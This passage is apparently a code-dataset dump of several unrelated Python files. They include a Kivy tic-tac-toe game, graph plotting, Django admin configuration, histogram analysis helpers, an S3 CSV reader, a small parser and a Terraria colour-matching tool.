Window\nfrom functools import partial\nimport sys\n\nBuilder.load_file('TicTacToe_v2.kv')\nWindow.size = (600, 600)\n\nclass Variables:\n\n def __init__(self, score_player_x=0, score_player_o=0, player_turn='X', player_x_won=False, player_o_won=False, victory_button=None):\n if victory_button is None:\n victory_button = []\n self.score_player_x = score_player_x\n self.score_player_o = score_player_o\n self.player_turn = player_turn\n self.player_x_won = player_x_won\n self.player_o_won = player_o_won\n self.victory_button = victory_button\n\nvariables = Variables()\n\nclass GameOverPopup(Popup):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n if variables.player_x_won:\n self.ids.popup_declare_winner.text = 'Player X won.'\n elif variables.player_o_won:\n self.ids.popup_declare_winner.text = 'Player O won.'\n\nclass MyLayout(Widget):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n for i in range(1, 101):\n board_button = BoardButton()\n self.ids[f'button_{i}'] = board_button\n self.ids.playboard.add_widget(board_button)\n board_button.bind(on_release=partial(self.play, f'button_{i}'))\n\n def reset_score(self):\n self.reset()\n self.ids.player_x_score.text = '0'\n self.ids.player_o_score.text = '0'\n\n def reset(self):\n for i in range(1, 101):\n self.ids[f'button_{i}'].text = ''\n self.ids[f'button_{i}'].background_color = (179/255, 179/255, 1, 1)\n variables.player_x_won = False\n variables.player_o_won = False\n variables.player_turn = 'X'\n\n def play(self, number, state):\n print(f'Button {number} pressed.')\n\n if self.ids[number].text == '':\n self.ids[number].text = variables.player_turn\n self.check_winner_x(variables.player_turn)\n else:\n return\n if variables.player_turn == 'X':\n self.ids[number].color = (0, 0, 1, 1)\n variables.player_turn = 'O'\n elif variables.player_turn == 'O':\n self.ids[number].color = (1, 0, 0, 1)\n variables.player_turn = 'X'\n\n def declare_winner(self, winner):\n\n if winner == 'X':\n variables.score_player_x += 1\n self.ids.player_x_score.text = f'{variables.score_player_x}'\n elif winner == 'O':\n variables.score_player_o += 1\n self.ids.player_o_score.text = f'{variables.score_player_o}'\n open_popup = GameOverPopup()\n open_popup.open()\n # self.reset()\n\n def check_winner_x(self, symbol):\n self.check_row(symbol)\n self.check_column(symbol)\n self.check_down(symbol)\n self.check_up(symbol)\n\n def check_row(self, symbol):\n for n in range(0, 10):\n x = 10*n\n iterator = 0\n for i in range(1, 11):\n if self.ids[f'button_{i+x}'].text == symbol:\n iterator += 1\n variables.victory_button.append(f'button_{i+x}')\n else:\n iterator = 0\n variables.victory_button.clear()\n if iterator == 5:\n if symbol == 'X':\n variables.player_x_won = True\n self.highlight_win()\n self.declare_winner(symbol)\n break\n elif symbol == 'O':\n variables.player_o_won = True\n self.highlight_win()\n self.declare_winner(symbol)\n break\n\n def check_column(self, symbol):\n\n for i in range(1, 11):\n iterator = 0\n for n in range(0, 10):\n x = 10*n\n if self.ids[f'button_{x+i}'].text == symbol:\n iterator += 1\n variables.victory_button.append(f'button_{x+i}')\n else:\n iterator = 0\n variables.victory_button.clear()\n if iterator == 5:\n if symbol == 'X':\n variables.player_x_won = True\n self.highlight_win()\n self.declare_winner(symbol)\n break\n elif symbol == 'O':\n variables.player_o_won = True\n self.highlight_win()\n self.declare_winner(symbol)\n break\n\n def check_down(self, symbol):\n\n for n in range(0, 11):\n if n in [0, 1, 2, 3, 4, 5]:\n x = 10*n\n else:\n x = n - 5\n iterator = 0\n for i in range(0, 10):\n try:\n # print(x+1+(11*i))\n if self.ids[f'button_{x+1+(11*i)}'].text == symbol:\n iterator += 1\n variables.victory_button.append(f'button_{x+1+(11*i)}')\n else:\n iterator = 0\n variables.victory_button.clear()\n except KeyError:\n pass\n if iterator == 5:\n if symbol == 'X':\n variables.player_x_won = True\n self.highlight_win()\n self.declare_winner(symbol)\n break\n elif symbol == 'O':\n variables.player_o_won = True\n self.highlight_win()\n self.declare_winner(symbol)\n break\n\n def check_up(self, symbol):\n\n for n in range(1, 7):\n iterator = 0\n for i in range(0, 10):\n try:\n if self.ids[f'button_{(10*n)+(i*9)}'].text == symbol:\n iterator += 1\n variables.victory_button.append(f'button_{(10*n)+(i*9)}')\n else:\n iterator = 0\n variables.victory_button.clear()\n except KeyError:\n pass\n if iterator == 5:\n if symbol == 'X':\n variables.player_x_won = True\n self.highlight_win()\n self.declare_winner(symbol)\n break\n elif symbol == 'O':\n variables.player_o_won = True\n self.highlight_win()\n self.declare_winner(symbol)\n break\n iterator_2 = 0\n for n in range(1, 6):\n iterator = 0\n for i in range(0, (9-iterator_2)):\n try:\n if self.ids[f'button_{(10-n)+(i*9)}'].text == symbol:\n iterator += 1\n variables.victory_button.append(f'button_{(10-n)+(i*9)}')\n else:\n iterator = 0\n variables.victory_button.clear()\n except KeyError:\n pass\n if iterator == 5:\n if symbol == 'X':\n variables.player_x_won = True\n self.highlight_win()\n self.declare_winner(symbol)\n break\n elif symbol == 'O':\n variables.player_o_won = True\n self.highlight_win()\n self.declare_winner(symbol)\n break\n iterator_2 += 1\n\n def highlight_win(self):\n for j, button in enumerate(variables.victory_button):\n self.ids[button].background_color = (1, 71 / 255, 26 / 255, 1)\n\n @staticmethod\n def exit_program():\n sys.exit()\n\nclass BoardButton(Button):\n pass\n\nclass TicTacToeApp(App):\n mainlayout = MyLayout()\n\n def build(self):\n Window.clearcolor = (1, 1, 1, 1)\n return self.mainlayout\n\nif __name__ == '__main__':\n TicTacToeApp().run()\n\n","repo_name":"f22daniel/TicTacToe_Kivy","sub_path":"TicTacToe_v2.py","file_name":"TicTacToe_v2.py","file_ext":"py","file_size_in_byte":8398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39034253081","text":"# sudo pip3 install igraph\n\nimport igraph\nimport sys\nfrom PIL import Image\n\ngraph_dir = sys.argv[1]\n\nfile_path = graph_dir + '/gml.txt'\nlabel_file = graph_dir + '/labels.txt'\nimage_path = graph_dir + '/graph_image.png'\n\ndef getValue(value):\n colorList = ['blue','green','purple','yellow','red','pink','orange','black','white','gray','brown','wheat', \n 'coral', 'alice blue', 'cyan', 'green yellow', 'light blue', 'hot pink', 'light green', 'gold']\n\n return colorList[int(value)]\n\ndef drawIGraph(file_path, image_path):\n g = igraph.Graph.Read_GML(file_path)\n g.vs['label'] = ['']\n\n igraph.plot(g, image_path)\n\ndef drawIGraphWithLabel(file_path, image_path, label_list):\n g = igraph.Graph.Read_GML(file_path)\n g.vs['label'] = ['']\n\n visual_style = dict()\n visual_style['vertex_color'] = list(map(getValue, label_list))\n\n igraph.plot(g, image_path, **visual_style)\n # image = igraph.plot(g, **visual_style)\n # image.save(image_path)\n\ndef drawIGraphWithLabelFile(file_path, image_path, label_file):\n f = open(label_file)\n s = f.read()\n label_list = s.split()\n # print(label_list)\n \n drawIGraphWithLabel(file_path, image_path, label_list)\n\ndrawIGraphWithLabelFile(file_path, image_path, label_file)","repo_name":"AIBluefisher/DAGSfM","sub_path":"scripts/python/read_igraph.py","file_name":"read_igraph.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":368,"dataset":"github-code","pt":"75"} +{"seq_id":"23638594760","text":"from django.contrib import admin\nfrom .models import Profile, User\n\n#Include Profile form in user form. Add and change User in conjuction with Profile.\n'''Because signals are used, when a user is created a profile is created simultaneously.\nIf Profile form is not included in User form, an error is generated with the uniques files in Profile.\nIf Profile doesn't have Unique it might not be put as inlines.\n'''\nclass ProfileAdminInline(admin.StackedInline):\n model = Profile #Model reference\n can_delete = False\n verbose_name_plural = 'Profile'\n fk_name = 'email' #Model foreign key\n\n list_display = ('name', 'last_name', 'dni_number', 'updated')\n list_filter = ('name', 'last_name', 'dni_number') #Fields to order information in shown list\n \n #Fields in admin to edit-add\n fieldsets = (\n (None,{\n 'fields' : (('name', 'last_name'), 'avatar', 'updated')\n }),\n\n ('Personal Information',{\n 'classes' : ('wide',),\n 'fields' : (('dni_number', 'dni_type'), 'birth_date', 'gender')\n\n }),\n\n ('Location',{\n 'classes' : ('wide',),\n 'fields' : ('country', 'province', 'city')\n }),\n )\n\nclass UserAdmin(admin.ModelAdmin):\n #Include Profile form in User form\n inlines = [\n ProfileAdminInline,\n ]\n\n list_display = ('email', 'is_active')\n fieldsets = (\n (None, {\n 'fields' : ('email', 'password', ('groups', 'user_permissions'),'is_superuser', 'is_active', 'is_staff', 'is_admin')\n }),\n )\n\nadmin.site.register(User, UserAdmin)","repo_name":"nicoduquelsky/etitango","sub_path":"etitango/apps/profiles/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15426546624","text":"from hparams import Hparams\nimport time\nimport os\nimport wandb\nimport torch\nimport torchvision\nfrom random import randrange\n\n\ndef initiate_run(hparams: Hparams):\n \"\"\"\n Initialize connection to wandb and begin the run using provided hparams\n \"\"\"\n with open(hparams.keyring_dir + \"wandb.key\") as key:\n wandb.login(key=key.read().strip())\n key.close()\n\n if hparams.use_wandb:\n mode = \"online\"\n else:\n mode = \"disabled\"\n\n run = wandb.init(\n name=f\"{hparams.architecture}_{int(time.time())}\",\n project=hparams.project,\n config=hparams.wandb_export(),\n mode=mode,\n )\n\n return run\n\n\ndef load_model(hparams, model, optimizer, scheduler=None):\n\n model_pth = os.path.join(\n hparams.model_dir, f\"{hparams.architecture}/checkpoint.pth\"\n )\n\n params = torch.load(model_pth)\n model.load_state_dict(params[\"model_state_dict\"])\n optimizer.load_state_dict(params[\"optimizer_state_dict\"])\n if scheduler is not None:\n scheduler.load_state_dict(params[\"scheduler_state_dict\"])\n\n return model, optimizer, scheduler\n\n return model, optimizer\n\n\ndef prepare_instance() -> None:\n return NotImplementedError\n\n\ndef test_transforms(hparams, num: int = 5, start: int = -1) -> None:\n TRAIN_DIR = os.path.join(hparams.data_dir, \"classification/train\")\n transform_stack = list(hparams.transform_stack)\n train_transforms = torchvision.transforms.Compose(transform_stack)\n train_dataset = torchvision.datasets.ImageFolder(\n TRAIN_DIR, transform=train_transforms\n )\n\n if start == -1:\n offset = randrange(start=0, stop=len(train_dataset) - num)\n else:\n offset = start\n\n for i in range(offset, offset + num):\n display(train_dataset[i][0])\n","repo_name":"josephbajor/CMU_11-785_face_identification","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13286043835","text":"from django.db import models\n\nfrom datetime import datetime\n\nclass Task(models.Model):\n user_id = models.IntegerField(null=True)\n name = models.CharField(max_length=200)\n deadline = models.DateTimeField('deadline')\n description = models.TextField(default=None, blank=True, null=True)\n\n def str_type(self):\n delta_time = (self.deadline.replace(tzinfo=None) - datetime.now()).total_seconds()\n \n deta_time_str = ''\n\n seconds = int(delta_time % 60)\n delta_time /= 60\n\n minutes = int(delta_time % 60)\n delta_time /= 60\n\n hours = int(delta_time % 24)\n delta_time /= 24\n\n days = int(delta_time)\n\n big_delay = False\n if days!=0:\n deta_time_str += f\"{days} days \"\n big_delay = True\n\n if hours!=0:\n deta_time_str += f\"{hours} hours \"\n big_delay = True\n \n if not big_delay:\n if minutes!=0:\n deta_time_str += f\"{minutes} minutes \"\n \n if seconds!=0:\n deta_time_str += f\"{seconds} seconds \"\n \n if days<=1:\n label_type = 'danger'\n elif days>=2:\n label_type = 'warning'\n else: \n label_type = 'success'\n\n return deta_time_str, label_type","repo_name":"matrix1220/django_task","sub_path":"task/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9571500694","text":"# All functions used in the jupyter notebook, to avoid cluttering the notebook.\n\nimport os, sys\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\ndef plot_hist(data,slice_selection, use_weighted, normalize_by_maxval=False,save_dir=None, color_map=None, ylim=None): \n \"\"\"Plots orientation distribution in different flavors.\n data: numpy array with (rows,cols)=(slices,histogram count (180bins)) (obtained from fiji script + processed in notebook)\n slice_selection: None or a list of indices, e.g. [1] or [2,5]. one-based\n use_weighted. boolean. Whether a coherency-weighted histogram is used. Must match the data! Here used for correct\n axis labeling.\n normalize_by_maxval: boolean. whether to normalize the distribution of each slice individually by its max, such \n that the max value (most frequent hist count) is =1. \n save_dir: if not None: saves plots into this directory. Folder must exist on disk.\n color_map: None (uses \"copper\") or any of these strings: https://matplotlib.org/tutorials/colors/colormaps.html\n ylim: if not None: sets the ylim\n \"\"\"\n \n # prepare save name for figure\n figname=\"OrientationHistogram\"\n descr1=\"_AllSlices\" if (slice_selection is None) else \"_SelectedSlices\"\n descr2=\"_CoherencyWeightedCount\" if (use_weighted) else \"_UnweightedCount\"\n descr3=\"_NormalizedToMax1\" if (normalize_by_maxval) else \"\"\n figname=figname+descr1+descr2+descr3+\".png\"\n \n # prepare figure description\n if use_weighted:\n if normalize_by_maxval:\n ylabel=\"frequency (weighted, normalized by max)\"\n title=\"Orientation distribution (weighted with coherencies, per slice normalized by max)\"\n else:\n ylabel=\"frequency (weighted)\"\n title=\"Orientation distribution (weighted with coherencies)\"\n else:\n if normalize_by_maxval:\n ylabel=\"frequency (normalized by max)\"\n title=\"Orientation distribution (unweighted, per slice normalized by max)\"\n else:\n ylabel=\"frequency\"\n title=\"Orientation distribution (unweighted)\"\n \n # init plot\n angles=np.linspace(-89.5,89.5,180) # center of bins\n plt.figure(figsize=(12,7))\n ax = plt.subplot(111)\n \n # use all slices if not specified\n if slice_selection is None:\n slice_selection=np.arange(1,1+data.shape[0])\n \n # prepare array with colors\n if color_map is None:\n color_map=\"copper\"\n colors=np.squeeze(plt.get_cmap(color_map)([np.linspace(0,1,len(slice_selection))]))\n \n # if only one slice plotted, need to make colors array 2d\n if colors.ndim==1:\n colors=np.expand_dims(colors,axis=0)\n \n # actual plotting\n for idx in range(len(slice_selection)):\n s=slice_selection[idx]\n y=data[s-1,:] # slices are one-based\n\n if normalize_by_maxval:\n maxval=np.max(y)\n y=y/maxval\n\n plt.plot(angles,y,color=colors[idx],label=\"slice \"+str(s)) \n \n plt.xlim([-90,90])\n plt.xlabel(\"orientation (in degree)\",size=14)\n plt.ylabel(ylabel,size=14)\n plt.title(title,size=14)\n\n # Shrink current axis by 20%\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n # Put a legend to the right of the current axis\n ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n \n # y-axis adjustement\n if ylim is not None:\n plt.ylim(ylim)\n \n # save the figure\n if save_dir is not None:\n plt.savefig(os.path.join(save_dir,figname))\n\n plt.show()\n \n \n \ndef plot_coherency(data,use_weighted, save_dir=None): \n if not use_weighted:\n print(\"Cannot calculate average coherency with unweighted histogram. Rerun the notebook with 'use_weighted=True'\")\n return\n \n # unweighted histogram sums to =1. therefore the weighted sums to mean(coherency)\n avg_coherencies=np.sum(data,1) \n xax=np.arange(1,len(avg_coherencies)+1)\n\n plt.figure(figsize=(9,5))\n plt.plot(avg_coherencies,\".-\")\n plt.ylim([0,1])\n plt.xlabel(\"slice id\",size=16)\n plt.ylabel(\"average coherency\",size=16)\n plt.title(\"average coherency (measure for orientation confidence) per slice\",size=16)\n plt.xticks(xax)\n \n # save the figure\n if save_dir is not None:\n fn=os.path.join(save_dir,\"Average_Coherency_per_Slice.png\")\n plt.savefig(fn)\n \n plt.show()\n\n \n \ndef get_filename_csv_histdata(data_folder, use_weighted):\n \"\"\"Returns the full path filename of the csv file which contains the histogram data, takes thereby care of \n whether the weighted/unweighted data is being used.\n Basenames of the csv files are hardcoded.\n \"\"\"\n fn_weightedhist=\"orientationDistribution_CoherencyWeighted.csv\"\n fn_unweightedhist=\"orientationDistribution_Unweighted.csv\"\n\n if use_weighted:\n fn_load=os.path.join(data_folder,fn_weightedhist)\n else:\n fn_load=os.path.join(data_folder,fn_unweightedhist)\n\n if not os.path.isfile(fn_load):\n print(\"ERROR: Cannot find the csv file with histogram data: \\n\",fn_load)\n else:\n print(\"Found csv file with histogram data:\",fn_load)\n\n return fn_load\n \n \ndef quick_plot_of_peak_selection(datasets,use_weighted,sliceids_longitudinal, sliceids_circular, titles, save_dir=None, ylim=None): \n \"\"\" Quick visualization to check whether the selected circular/longitudinal slices (peaks) are correct.\n Comparable to plot_hist but less fancy (however more convenient colormap for this purpose). \n Does allow for plotting multiple datasets at once.\n data: list[arrays], or a single numpy array with (rows,cols)=(slices,histogram count (180bins)) (obtained from fiji script + processed in notebook)\n use_weighted: for axis labeling\n sliceids_longitudinal: list[ints] or single int of the slice id with the longitudinal fiber orientation peak\n sliceids_circular: see above\n titles: list[strings] or string with typically the dataset name. \n save_dir: if not None: saves plots into this directory. Folder must exist on disk.\n ylim: if not None: sets the ylim\n \"\"\"\n \n # save name for figure\n figname=\"OverviewPeakSelection.png\"\n \n # prepare figure description\n if use_weighted:\n ylabel=\"frequency (weighted)\"\n else:\n ylabel=\"frequency\"\n \n # convert single dataset also to list\n if not isinstance(datasets,list):\n datasets=[datasets]\n sliceids_longitudinal=[sliceids_longitudinal]\n sliceids_circular=[sliceids_circular]\n titles=[titles]\n \n assert len(datasets) == len(sliceids_longitudinal) == len(sliceids_circular) == len(titles)\n \n # bin centers\n angles=np.linspace(-89.5,89.5,180) \n \n # subplots layout\n ncols=1 if len(datasets)==1 else 2\n nrows=int(1+len(datasets)/ncols)\n \n plt.figure(figsize=(6*ncols,4*nrows))\n plt.subplots_adjust(hspace=0.4) # default=0.2\n \n # one subplot per dataset\n for data_id in range(len(datasets)):\n plt.subplot(nrows,ncols,data_id+1)\n \n data=datasets[data_id]\n slice_long=sliceids_longitudinal[data_id]\n slice_circ=sliceids_circular[data_id]\n title=titles[data_id]\n \n for idx in range(data.shape[0]):\n plt.plot(angles,data[idx,:],color=[0.7,0.7,0.7])\n \n plt.plot(angles,data[slice_long-1,:],color=[0.9,0,0]) #red\n plt.plot(angles,data[slice_circ-1,:],\"blue\") \n \n plt.xlim([-90,90])\n plt.xlabel(\"orientation (in degree)\",size=12)\n plt.ylabel(ylabel,size=12)\n plt.title(title+\" (slices: \"+str(slice_circ)+\", \"+str(slice_long)+\")\",size=14)\n\n # y-axis adjustement\n if ylim is not None:\n plt.ylim(ylim)\n\n\n # save the figure\n if save_dir is not None:\n plt.savefig(os.path.join(save_dir,figname))\n\n plt.show()\n \n \n\n\n \ndef _sliceid_of_highest_peak_within_tolerance(maxvals, dist, tolerance):\n \"\"\"returns the id of the slice with the highest peak value (maxvals), for which the peak location distance (dist)\n to the expected max location is less than peak tolerance (in deg)\n slice_id is one based!.\n \"\"\"\n sub_sliceidxs=np.where(dist90 or <-90\n dist[dist>90]=abs(180-dist[dist>90])\n return dist # in degree\n \n dist_longitudinal=compute_angle_dist(max_loc_degrees,peak_longitudinal_expected) \n dist_circular=compute_angle_dist(max_loc_degrees,peak_circular_expected)\n\n # slice ids of circular/longitudinal peaks\n circ_id=_sliceid_of_highest_peak_within_tolerance(max_values,dist_circular,peak_tolerance)\n long_id=_sliceid_of_highest_peak_within_tolerance(max_values,dist_longitudinal,peak_tolerance) \n \n return circ_id, long_id\n\n\n\ndef load_datasets_and_find_peaks(list_of_folders,use_weighted, peak_circular_expected, peak_longitudinal_expected):\n \"\"\"Processes all folders in list_of_folders: loads for each folder the histogram csv file, then finds the \n slice-ids (one-based) with the highest peak (for circular and longitudinal fibers separately).\n Params:\n use_weighted: should always be true\n peak_circular_expected, peak_longitudinal_expected: see _sliceids_of_longitudinal_and_circular_hist_peak\n Returns:\n data_list: list of numpy arrays of size (nslices, 180), one entry per folder of list_of_folders\n id_list_circular: list of slice id's (one based) for which the histogram of the circular fibers was highest.\n One id per dataset.\n id_list_longitudinal: see above \n \"\"\"\n\n data_list=[]\n id_list_circular=[]\n id_list_longitudinal=[]\n \n for datadir in list_of_folders:\n # load data and convert to numpy array\n fn_load=get_filename_csv_histdata(datadir,use_weighted)\n df=pd.read_csv(fn_load)\n data=(df.iloc[:,1:]).values # first/second,.. row: slice 1,2,..\n\n # find slices with highest peaks\n circ_id, long_id = _sliceids_of_longitudinal_and_circular_hist_peak(data,peak_circular_expected,peak_longitudinal_expected)\n \n data_list.append(data)\n id_list_circular.append(circ_id)\n id_list_longitudinal.append(long_id)\n \n return data_list,id_list_circular,id_list_longitudinal\n\n\ndef get_statistics(datasets, sliceids_long, sliceids_circ):\n \"\"\"Computes the mean and stddev between the orientation distributions of the different experiemnts.\n For each experiemnt the longitudinal and circular distribution with the highest peak is chosen \n params: see output of load_datasets_and_find_peaks()\n returns:\n ymean_circ, ystddev_circ, ymean_long, ystddev_long: the mean and stddev of the distributions, array of shape (180,)\n \"\"\"\n # collect circular, resp. longitudinal max-peak curves \n y_circ=collect_peak_distributions(datasets,sliceids_circ)\n y_long=collect_peak_distributions(datasets,sliceids_long)\n\n # get statistics\n ymean_circ=np.mean(y_circ,0)\n ystddev_circ=np.std(y_circ,0)\n ymean_long=np.mean(y_long,0)\n ystddev_long=np.std(y_long,0) \n \n return ymean_circ, ystddev_circ, ymean_long, ystddev_long\n\n \ndef collect_peak_distributions(datasets, sliceids):\n \"\"\"collect curves with highest peak. (sliceid: one-based). returns array (nsamples,180)\"\"\"\n y=np.zeros((len(datasets),datasets[0].shape[-1]))\n for i in range(y.shape[0]):\n y[i]=datasets[i][sliceids[i]-1,:] # one-based\n return y\n\n\ndef plot_average_histogram(ym_circ,ystd_circ,ym_long,ystd_long, numsamples=None, save_dir=None,ylim=None): \n \"\"\" Plots the average +- stddev orientaiton distribution of the orientation histogram (for longitudinal and circular).\n Purpose: plot result of get_statistics().\n Params:\n ym_circ, ystd_circ: mean and stddev of circular fiber distribution\n ym_long, ystd_long: ... longitudinal ...\n [removed: use_weighted]\n numsamples: optional: provide the number of datasets that was used (int) -> added to title\n save_dir: if not None: saves plots into this directory. Folder must exist on disk.\n ylim: if not None: sets the ylim\n \"\"\"\n \n figname=\"AveragedOrientationHistogram.png\"\n ylabel=\"frequency (mean+-stddev)\"\n title=\"Average orientation distribution\"\n if numsamples is not None:\n title+=\" (n=\"+str(numsamples)+\")\"\n \n # bin centers\n angles=np.linspace(-89.5,89.5,180) \n \n plt.figure(figsize=(7,5))\n ax = plt.subplot(111)\n \n # plotting\n plt.plot(angles,ym_circ, 'b-',label=\"circular\")\n plt.fill_between(angles,ym_circ-ystd_circ,ym_circ+ystd_circ,color=[0.8,0.8,0.8]) # light gray\n\n plt.plot(angles,ym_long, '-',color=[.9,0,0],label=\"longitudinal\") # red\n plt.fill_between(angles,ym_long-ystd_long,ym_long+ystd_long,color=[0.8,0.8,0.8]) \n\n plt.xlim([-90,90])\n plt.xlabel(\"orientation (in degree)\",size=14)\n plt.ylabel(ylabel,size=14)\n plt.title(title,size=14)\n \n ax.legend()\n\n # y-axis adjustement\n if ylim is not None:\n plt.ylim(ylim)\n\n # save the figure\n if save_dir is not None:\n plt.savefig(os.path.join(save_dir,figname))\n\n plt.show()","repo_name":"walkernoreen/muscle_fiber_orientation","sub_path":"helpers_histogram_analysis.py","file_name":"helpers_histogram_analysis.py","file_ext":"py","file_size_in_byte":14907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7025461570","text":"\nimport boto3\nimport pandas as pd\n\nAWS_ACCESS_KEY_ID = ''\nAWS_SECRET_ACCESS_KEY = ''\n\nAWS_REGION = 'us-east-1'\nAWS_STORAGE_BUCKET_NAME = 'pysparkwrite'\nFILE_NAME = 'part-00000-a4e2f798-ccce-4acd-9ad0-27197ac7b69a-c000.csv'\n\ns3 = boto3.client('s3', aws_access_key_id=AWS_ACCESS_KEY_ID, aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\n\nobj = s3.get_object(Bucket=AWS_STORAGE_BUCKET_NAME, Key=FILE_NAME)\ndf = pd.read_csv(obj)\nprint(df)","repo_name":"Spidyweb-3588/python_skillup","sub_path":"local_to_s3a/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"530539966","text":"from lex import lex\n\nconstants = [\"str\", \"int\", \"bool\"]\nvalidargs = [\"str\", \"int\", \"bool\", \"var\", \"staticvar\"]\n\ndef parse(filename):\n lexed = lex(filename)\n\n ast = []\n\n for line in lexed:\n ast.append(parseline(line))\n\n return ast\n\ndef parseline(line):\n if line[0] in constants:\n return line\n elif line[0] == \"args\":\n if len(line[1]) >= 1:\n buffer = []\n altbuffer = []\n line[1].append([\"argseperate\"])\n funcscope = 0\n for arg in line[1]:\n if arg[0] == \"function\":\n altbuffer.append(arg)\n funcscope += 1\n elif arg[0] == \"argend\":\n altbuffer.append(arg)\n funcscope -= 1\n elif funcscope == 0 and arg[0] == \"argseperate\":\n if len(altbuffer) > 1:\n buffer.append(altbuffer)\n else:\n buffer.append(altbuffer[0])\n altbuffer = []\n else:\n altbuffer.append(arg)\n for arg in buffer:\n if arg[0] in validargs:\n altbuffer.append(arg)\n else:\n altbuffer.append(parseline(arg))\n return altbuffer\n return []\n elif line[0][0] in constants:\n return parseline(line[0])\n elif line[0][0] == \"functiondefine\":\n argend = len(line) - 2\n args = []\n for i in range(3, argend):\n args.append(line[i][1])\n return [\"newfunc\", line[1][1], line[2][1], args]\n elif line[0][0] == \"functionterminate\":\n return [\"endfunc\"]\n elif line[0][0] == \"setvar\":\n if line[4][0] == \"function\":\n return [line[0][0], line[1][1], line[2][1], parseline(line[4:])]\n return [line[0][0], line[1][1], line[2][1], parseline(line[4])]\n elif line[0][0] == \"setstaticvar\":\n if line[4][0] == \"function\":\n raise Exception(\"error: staticvar cannot be set as returned value from function\")\n return [line[0][0], line[1][1], line[2][1], parseline(line[4])]\n elif line[0][0] == \"function\":\n if line[1][0] == \"argend\":\n return [\"call\", line[0][1], []]\n else:\n return [\"call\", line[0][1], parseline([\"args\", line[1:-1]])]\n elif line[0][0] == \"assert\":\n return [line[0][0], line[1]]\n elif line[0][0] == \"ifdefine\":\n return [line[0][0], [parseline(line[2:-2])]]\n elif line[0][0] == \"whiledefine\":\n return [line[0][0], [parseline(line[2:-2])]]\n raise Exception(\"token unknown\")\n\nif __name__ == \"__main__\":\n print(parse(\"../tests/printstr.psn\"))\n","repo_name":"urlordjames/pointysnake","sub_path":"src/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"42777500913","text":"\n# -*- coding: utf-8 -*-\n\nimport json\nimport os\nfrom tkinter import *\nimport color_helper\n\n\n# ペイント後の色計算式、テラリアより抜粋し,python用に調整したもの\n# base_color(タイル + 壁の色リスト) paint_color(ペンキの色リスト) painted(着色されたタイルと壁)\ndef painted_color(base_color, paint_color, wall):\n red = base_color[0] / 255\n green = base_color[1] / 255\n blue = base_color[2] / 255\n\n if green > red:\n red = green\n if blue > red:\n num = red\n red = blue\n blue = num\n\n # Shadow\n if(paint_color[0] == 25 and paint_color[1] == 25 and paint_color[2] == 25):\n shadow = blue * 0.3\n painted_red = int(paint_color[0] * shadow)\n painted_green = int(paint_color[1]* shadow)\n painted_blue = int(paint_color[2] * shadow)\n # Negative\n if (paint_color[0] == 200 and paint_color[1] == 200 and paint_color[2] == 200):\n if wall:\n painted_red = int((255 - base_color[0]) * 0.5)\n painted_green = int((255 - base_color[1]) * 0.5)\n painted_blue = int((255 - base_color[2]) * 0.5)\n else:\n painted_red = int(255 - base_color[0])\n painted_green = int(255 - base_color[1])\n painted_blue = int(255 - base_color[2])\n else:\n new_brightness = red\n painted_red = int(paint_color[0] * new_brightness)\n painted_green = int(paint_color[1] * new_brightness)\n painted_blue = int(paint_color[2] * new_brightness)\n\n return [painted_red, painted_green, painted_blue]\n\n\n # 差分のスコアが小さいタイル5件を作成\ndef return_min_scores(r, g, b, target_color_list):\n input_color = [r, g, b]\n scores = [(available_matrices[config['matrix']](input_color, color), i) for i,\n color in enumerate(target_color_list)]\n min_scores_index = sorted(scores)[:5]\n return min_scores_index\n\n\n# return_min_scoresのイ��デックスより名前を判別して返す\n# リスト形式はtile + wall + tile(paint1) + wall(paint1) + tile(paint2)...\ndef select_tile_combination(r, g, b, target_color_list):\n names = ''\n num = return_min_scores(r, g, b, target_color_list)\n for i in num:\n if i[1] >= paint_start:\n paint_name = '+{}Paint'.format(paint_dictionary[int(i[1] / paint_start) - 1]['name'])\n else:\n paint_name = ''\n\n target_index = i[1] % paint_start\n target_item = base_dictionary[target_index]['name']\n target_item_rgb = map_colors[i[1]][:3]\n if target_index >= wall_start:\n tile_type = 'wall'\n else:\n tile_type = 'tile'\n\n names += '({}) {}{} {}\\n\\n'.format(tile_type, target_item, paint_name, target_item_rgb)\n return names\n\nclass RgbInputFrame():\n def __init__(self, master):\n frame = Frame(master)\n frame.pack()\n\n self.txt = StringVar()\n self.txt.set('')\n self.bool1 = BooleanVar()\n self.bool1.set(True)\n\n self.description = Label(master, text = '検索したい色を選択してsearchボタンを押してください')\n self.description.pack()\n self.description.place(x = 30, y = 10)\n\n self.lbl1 = Label(master, text='red')\n self.lbl1.pack()\n self.lbl1.place(x = 160, y = 50)\n self.lbl2 = Label(master, text='green')\n self.lbl2.pack()\n self.lbl2.place(x = 160, y = 90)\n self.lbl3 = Label(master, text='blue')\n self.lbl3.pack()\n self.lbl3.place(x = 160, y = 130)\n\n self.scrl1 = Scale(master, orient = HORIZONTAL, to = 255, command = self.scrl_method)\n self.scrl1.pack()\n self.scrl1.place(x = 200, y = 30)\n self.scrl2 = Scale(master, orient = HORIZONTAL, to = 255, command = self.scrl_method)\n self.scrl2.pack()\n self.scrl2.place(x = 